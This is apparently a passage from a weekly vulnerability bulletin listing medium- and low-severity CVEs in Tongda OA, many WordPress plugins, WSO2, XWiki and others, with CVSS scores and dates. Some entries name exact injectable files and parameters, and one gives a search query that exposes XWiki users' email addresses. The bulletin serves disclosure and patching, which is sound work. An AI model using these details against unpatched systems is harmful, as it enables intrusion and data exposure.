tongda — tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.9. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/vehicle/query/delete.php. The manipulation of the argument VU_ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-248570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7023
[email protected]
[email protected]
[email protected]
uffizio — gps_trackerAn Open Redirection vulnerability exists in Uffizio’s GPS Tracker all versions allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain.2023-12-166.1CVE-2020-17484
[email protected]
[email protected]
uyumsoft — lioxerpImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Uyumsoft Information System and Technologies LioXERP allows Reflected XSS. This issue affects LioXERP: before v.146.2023-12-216.1CVE-2023-5988
[email protected]
uyumsoft — lioxerpImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Uyumsoft Information System and Technologies LioXERP allows Stored XSS. This issue affects LioXERP: before v.146.2023-12-215.4CVE-2023-5989
[email protected]
w3m — w3mAn out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition.2023-12-215.5CVE-2023-4255
[email protected]
[email protected]
[email protected]
[email protected]
wordpress — wordpressServer-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform. This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.1.2023-12-186.5CVE-2022-40312
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Glen Don L. Mongaya Drag and Drop Multiple File Upload for WooCommerce. This issue affects Drag and Drop Multiple File Upload for WooCommerce: from n/a through 1.0.8.2023-12-216.5CVE-2022-45377
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Tribulant Slideshow Gallery LITE. This issue affects Slideshow Gallery LITE: from n/a through 1.7.6.2023-12-206.7CVE-2023-28491
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce Shipping Multiple Addresses. This issue affects Shipping Multiple Addresses: from n/a through 3.8.3.2023-12-216.5CVE-2023-32799
[email protected]
wordpress — wordpressURL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Magazine3 Core Web Vitals & PageSpeed Booster. This issue affects Core Web Vitals & PageSpeed Booster: from n/a through 1.0.12.2023-12-196.1CVE-2023-35883
[email protected]
wordpress — wordpressURL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.3.3.2023-12-196.1CVE-2023-37982
[email protected]
wordpress — wordpressURL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for WooCommerce and QuickBooks. This issue affects Integration for WooCommerce and QuickBooks: from n/a through 1.2.3.2023-12-196.1CVE-2023-38478
[email protected]
wordpress — wordpressURL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin. This issue affects Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin: from n/a before 1.3.7.2023-12-196.1CVE-2023-38481
[email protected]
wordpress — wordpressURL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Doofinder Doofinder WP & WooCommerce Search. This issue affects Doofinder WP & WooCommerce Search: from n/a through 1.5.49.2023-12-196.1CVE-2023-40602
[email protected]
wordpress — wordpressURL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Swapnil V. Patil Login and Logout Redirect. This issue affects Login and Logout Redirect: from n/a through 2.0.3.2023-12-196.1CVE-2023-41648
[email protected]
wordpress — wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Media File Renamer: Rename Files (Manual, Auto & AI). This issue affects Media File Renamer: Rename Files (Manual, Auto & AI): from n/a through 5.6.9.2023-12-196.5CVE-2023-44991
[email protected]
wordpress — wordpressURL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in SERVIT Software Solutions affiliate-toolkit – WordPress Affiliate Plugin. This issue affects affiliate-toolkit – WordPress Affiliate Plugin: from n/a through 3.3.9.2023-12-196.1CVE-2023-45105
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in KaineLabs Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress. This issue affects Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress: from n/a through 1.2.2.2023-12-216.5CVE-2023-47191
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Mahlamusa Who Hit The Page – Hit Counter allows SQL Injection. This issue affects Who Hit The Page – Hit Counter: from n/a through 1.4.14.3.2023-12-186.5CVE-2023-47558
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in captainform Forms by CaptainForm – Form Builder for WordPress allows Reflected XSS. his issue affects Forms by CaptainForm – Form Builder for WordPress: from n/a through 2.5.3.2023-12-156.1CVE-2023-49170
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS. This issue affects WP Pocket URLs: from n/a through 1.0.2.2023-12-156.1CVE-2023-49176
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Gilles Dumas which template file allows Reflected XSS. This issue affects which template file: from n/a through 4.9.0.2023-12-156.1CVE-2023-49177
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS. This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0.2023-12-156.1CVE-2023-49178
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS. This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10.2023-12-156.1CVE-2023-49182
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS. This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2.2023-12-156.1CVE-2023-49183
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS. This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7.2023-12-156.1CVE-2023-49185
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Spoonthemes Adifier – Classified Ads WordPress Theme allows Reflected XSS. This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4.2023-12-156.1CVE-2023-49187
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in smp7, wp.Insider Simple Membership allows Reflected XSS. This issue affects Simple Membership: from n/a through 4.3.8.2023-12-196.1CVE-2023-50376
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Currency.Wiki Currency Converter Widget – Exchange Rates allows Stored XSS. This issue affects Currency Converter Widget – Exchange Rates: from n/a through 3.0.2.2023-12-216.5CVE-2023-50822
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Wipeout Media CSS & JavaScript Toolbox allows Stored XSS. This issue affects CSS & JavaScript Toolbox: from n/a through 11.7.2023-12-216.5CVE-2023-50823
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XSS. This issue affects Insert or Embed Articulate Content into WordPress: from n/a through 4.3000000021.2023-12-216.5CVE-2023-50824
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Terrier Tenacity iframe Shortcode allows Stored XSS. This issue affects iframe Shortcode: from n/a through 2.0.2023-12-216.5CVE-2023-50825
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in VillaTheme CURCY – Multi Currency for WooCommerce allows Stored XSS. This issue affects CURCY – Multi Currency for WooCommerce: from n/a through 2.2.0.2023-12-216.5CVE-2023-50831
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ExtendThemes Colibri Page Builder allows Stored XSS. This issue affects Colibri Page Builder: from n/a through 1.0.239.2023-12-216.5CVE-2023-50833
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in August Infotech WooCommerce Menu Extension allows Stored XSS. This issue affects WooCommerce Menu Extension: from n/a through 1.6.2.2023-12-216.5CVE-2023-50834
[email protected]
wordpress — wordpressThe Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users.2023-12-186.1CVE-2023-5348
[email protected]
wordpress — wordpressThe Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected2023-12-186.5CVE-2023-6077
[email protected]
wordpress — wordpressThe Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘et_pb_text’ shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-236.4CVE-2023-6744
[email protected]
[email protected]
wordpress — wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker – Popup for opt-ins, lead gen, & more. This issue affects Popup Maker – Popup for opt-ins, lead gen, & more: from n/a through 1.17.1.2023-12-205.3CVE-2022-47597
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager. This issue affects File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7.2023-12-205.5CVE-2022-47599
[email protected]
wordpress — wordpressMissing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Hal Gatewood Dashicons + Custom Post Types. This issue affects Dashicons + Custom Post Types: from n/a through 1.0.2.2023-12-215.4CVE-2023-22674
[email protected]
wordpress — wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users. This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1.2023-12-215.9CVE-2023-2487
[email protected]
wordpress — wordpressMissing Authorization vulnerability in GamiPress GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress. This issue affects GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress: from n/a through 2.5.6.2023-12-195.4CVE-2023-25715
[email protected]
wordpress — wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Winwar Media WordPress Email Marketing Plugin – WP Email Capture. This issue affects WordPress Email Marketing Plugin – WP Email Capture: from n/a through 3.10.2023-12-215.3CVE-2023-28421
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 1.15.78.2023-12-215.4CVE-2023-32747
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in MarketingFire Editorial Calendar. This issue affects Editorial Calendar: from n/a through 3.7.12.2023-12-205.4CVE-2023-36520
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom). This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5.2023-12-205.4CVE-2023-38513
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers. This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0.2023-12-205.3CVE-2023-41796
[email protected]
wordpress — wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina). This issue affects Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina): from n/a through 6.4.5.2023-12-195.3CVE-2023-44982
[email protected]
wordpress — wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Aruba.It Aruba HiSpeed Cache. This issue affects Aruba HiSpeed Cache: from n/a through 2.0.6.2023-12-195.3CVE-2023-44983
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in A WP Life Event Monster – Event Management, Tickets Booking, Upcoming Event allows Stored XSS. This issue affects Event Monster – Event Management, Tickets Booking, Upcoming Event: from n/a through 1.3.2.2023-12-215.9CVE-2023-47525
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Sajjad Hossain Sagor WP Edit Username allows Stored XSS. This issue affects WP Edit Username: from n/a through 1.0.5.2023-12-215.9CVE-2023-47527
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Till Krüss Email Address Encoder allows Stored XSS. This issue affects Email Address Encoder: from n/a through 1.0.22.2023-12-155.4CVE-2023-48765
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates. This issue affects Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5.2023-12-185.4CVE-2023-49148
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.6.2023-12-155.4CVE-2023-49160
[email protected]
wordpress — wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress. This issue affects BigCommerce For WordPress: from n/a through 5.0.6.2023-12-215.3CVE-2023-49162
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Real Big Plugins Client Dash allows Stored XSS. This issue affects Client Dash: from n/a through 2.2.1.2023-12-155.4CVE-2023-49165
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS. This issue affects Ads by datafeedr.Com: from n/a through 1.2.0.2023-12-155.4CVE-2023-49169
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS. This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5.2023-12-155.4CVE-2023-49174
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS. This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1.2023-12-155.4CVE-2023-49175
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS. This issue affects Event post: from n/a through 5.8.6.2023-12-155.4CVE-2023-49179
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS. This issue affects WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40.2023-12-155.4CVE-2023-49181
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS. This issue affects Parallax Slider Block: from n/a through 1.2.4.2023-12-155.4CVE-2023-49184
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WebFactory Ltd Guest Author allows Stored XSS. This issue affects Guest Author: from n/a through 2.3.2023-12-155.4CVE-2023-49747
[email protected]
wordpress — wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in AppMySite AppMySite – Create an app with the Best Mobile App Builder. This issue affects AppMySite – Create an app with the Best Mobile App Builder: from n/a through 3.11.0.2023-12-215.3CVE-2023-49762
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus. This issue affects WP Photo Album Plus: from n/a through 8.5.02.005.2023-12-195.3CVE-2023-49812
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat – WP live chat plugin for WordPress. This issue affects LiveChat – WP live chat plugin for WordPress: from n/a through 4.5.15.2023-12-185.4CVE-2023-49821
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in BoldThemes Bold Page Builder allows Stored XSS. This issue affects Bold Page Builder: from n/a through 4.6.1.2023-12-155.4CVE-2023-49823
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in AB-WP Simple Counter allows Stored XSS. This issue affects Simple Counter: from n/a through 1.0.2.2023-12-215.9CVE-2023-50377
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Freshlight Lab Menu Image, Icons made easy allows Stored XSS. This issue affects Menu Image, Icons made easy: from n/a through 3.10.2023-12-215.9CVE-2023-50826
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Accredible Accredible Certificates & Open Badges allows Stored XSS. This issue affects Accredible Certificates & Open Badges: from n/a through 1.4.8.2023-12-215.9CVE-2023-50827
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in David Vongries Ultimate Dashboard – Custom WordPress Dashboard allows Stored XSS. This issue affects Ultimate Dashboard – Custom WordPress Dashboard: from n/a through 3.7.11.2023-12-215.9CVE-2023-50828
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aerin Loan Repayment Calculator and Application Form allows Stored XSS. This issue affects Loan Repayment Calculator and Application Form: from n/a through 2.9.3.2023-12-215.9CVE-2023-50829
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Seosbg Seos Contact Form allows Stored XSS. This issue affects Seos Contact Form: from n/a through 1.8.0.2023-12-215.9CVE-2023-50830
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mondula GmbH Multi Step Form allows Stored XSS. This issue affects Multi Step Form: from n/a through 1.7.13.2023-12-215.9CVE-2023-50832
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Praveen Goswami Advanced Category Template. This issue affects Advanced Category Template: from n/a through 0.1.2023-12-195.4CVE-2023-50835
[email protected]
wordpress — wordpressThe Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘ihrss-gallery’ shortcode in versions up to, and including, 13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-195.4CVE-2023-5413
[email protected]
[email protected]
[email protected]
wordpress — wordpressThe Jquery news ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘jquery-news-ticker’ shortcode in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-195.4CVE-2023-5432
[email protected]
[email protected]
[email protected]
wordpress — wordpressThe Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn’t restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site’s code2023-12-185.3CVE-2023-6065
[email protected]
[email protected]
wordpress — wordpressThe WP Shortcodes Plugin – Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘su_button’, ‘su_members’, and ‘su_tabs’ shortcodes in all versions up to, and including, 7.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-195.4CVE-2023-6488
[email protected]
[email protected]
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in XWP Stream. This issue affects Stream: from n/a through 3.9.2.2023-12-194.3CVE-2022-43450
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in weDevs Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy. This issue affects Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.19.2023-12-194.4CVE-2023-34382
[email protected]
wordpress — wordpressURL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Parcel Pro. This issue affects Parcel Pro: from n/a through 1.6.11.2023-12-194.7CVE-2023-46624
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS. This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2.2023-12-154.8CVE-2023-49180
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS. This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4.2023-12-154.8CVE-2023-49188
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin – GetSocial.Io allows Stored XSS. This issue affects Social Share Buttons & Analytics Plugin – GetSocial.Io: from n/a through 4.3.12.2023-12-154.8CVE-2023-49189
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS. This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6.2023-12-154.8CVE-2023-49190
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS. This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2.2023-12-154.8CVE-2023-49191
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24.2023-12-154.8CVE-2023-49767
[email protected]
wordpress — wordpressImproper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeum Tutor LMS – eLearning and online course solution allows Stored XSS. This issue affects Tutor LMS – eLearning and online course solution: from n/a through 2.2.4.2023-12-154.8CVE-2023-49829
[email protected]
wordpress — wordpressThe Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)2023-12-184.8CVE-2023-5005
[email protected]
wordpress — wordpressThe Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin’s settings, which may include sensitive information such as Cloudflare API tokens.2023-12-184.3CVE-2023-6289
[email protected]
wordpress — wordpress
 		Authorization Bypass Through User-Controlled Key vulnerability in Blaz K. Rate my Post – WP Rating System. This issue affects Rate my Post – WP Rating System: from n/a through 3.4.1.2023-12-214.3CVE-2023-49765
[email protected]
wso2 — api_managerDue to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response.2023-12-155.3CVE-2023-6839
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — api_manager/iot_serverMultiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated.2023-12-154.3CVE-2023-6835
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_productsReflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests.2023-12-156.1CVE-2023-6838
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_productsMultiple WSO2 products have been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console.2023-12-184.8CVE-2023-6911
ed10eef1-636d-4fbe-9993-6890dfa878f8
xwiki — xwikiXWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki’s regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability.2023-12-155.3CVE-2023-50720
[email protected]
[email protected]
[email protected]
yiisoft — yii2-authclientyii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` is vulnerable for a `timing attack` since it is compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available.2023-12-226.1CVE-2023-50708
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
yiisoft — yii2-authclientyii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available.2023-12-226.8CVE-2023-50714
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product		DescriptionPublishedCVSS ScoreSource & Patch Info
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction.2023-12-153.5CVE-2023-48608
[email protected]
automad — automad
 		A vulnerability was found in automad up to 1.10.9 and classified as problematic. Affected by this issue is some unknown functionality of the file packages\standard\templates\post.php of the component Setting Handler. The manipulation of the argument sitename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-212.4CVE-2023-7035
[email protected]
[email protected]
[email protected]
code-projects — faculty_management_systemA vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744.2023-12-223.5CVE-2023-7057
[email protected]
[email protected]
[email protected]
code-projects — faculty_management_systemA vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743.2023-12-222.4CVE-2023-7056
[email protected]
[email protected]
[email protected]
code-projects — point_of_sales_and_inventory_management_systemA vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability.2023-12-223.5CVE-2023-7075
[email protected]
[email protected]
[email protected]
enterprise_server — enterprise_serverA race condition in GitHub Enterprise Server allowed an existing admin to maintain permissions on transferred repositories by making a GraphQL mutation to alter repository permissions during the transfer. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.2023-12-213.9CVE-2023-6690
[email protected]
[email protected]
[email protected]
[email protected]
